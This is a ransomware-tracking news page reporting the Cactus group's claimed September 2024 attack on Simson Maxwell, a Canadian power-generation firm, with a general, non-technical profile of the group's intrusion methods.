Simson Maxwell Hit by Cactus Ransomware Exposing Sensitive Data
Incident Date:
September 3, 2024
Overview
Title
Simson Maxwell Hit by Cactus Ransomware Exposing Sensitive Data
Victim
Simson Maxwell
Attacker
Cactus
Location
First Reported
September 3, 2024
Simson Maxwell Falls Victim to Cactus Ransomware Attack
Simson Maxwell, a prominent Canadian company specializing in power generation and industrial engine solutions, has recently been targeted by the Cactus ransomware group. This attack has resulted in the exposure of a significant amount of sensitive information, posing severe risks to the company's operations and reputation.
About Simson Maxwell
Established in 1941, Simson Maxwell has built a strong reputation over its 80-year history for delivering high-quality power generation and industrial engine products and services. The company operates from its headquarters in Edmonton, Alberta, and serves over 6,000 customers across Canada. With approximately 115 employees, Simson Maxwell is known for its custom power generation solutions under the Simmax® brand, as well as its comprehensive service and maintenance programs.
Details of the Attack
The Cactus ransomware group has claimed responsibility for the attack on Simson Maxwell via their dark web leak site. The breach has led to the exposure of a wide range of sensitive information, including business-related documents such as contracts, projects, and financial records. Additionally, customer information, corporate and personal correspondence, technical drawings and designs, and employee data have been compromised. This data leak underscores the critical need for effective cybersecurity measures to protect sensitive information from unauthorized access.
About the Cactus Ransomware Group
Identified in March 2023, the Cactus ransomware group has quickly become a notable player in the ransomware landscape. The group employs sophisticated tactics, including exploiting vulnerabilities in VPN appliances and leveraging phishing attacks to gain initial access to networks. Cactus ransomware is known for its double-extortion strategy, where it not only encrypts data but also threatens to leak sensitive information if the ransom is not paid. The malware uses a combination of RSA and AES encryption algorithms and employs various evasion techniques to avoid detection by antivirus software.
Penetration and Impact
Cactus primarily gains access to networks by exploiting known vulnerabilities in VPN devices, notably those from Fortinet, and vulnerabilities in data analytics platforms like Qlik Sense. The group also purchases stolen credentials from underground forums to facilitate their intrusions. Once inside a network, Cactus establishes command and control communications via SSH and utilizes Scheduled Tasks to maintain persistence. The malware performs network scanning to identify additional targets and often disables security software to facilitate its operations.
Sources
Recent Ransomware Attacks
The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.
The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.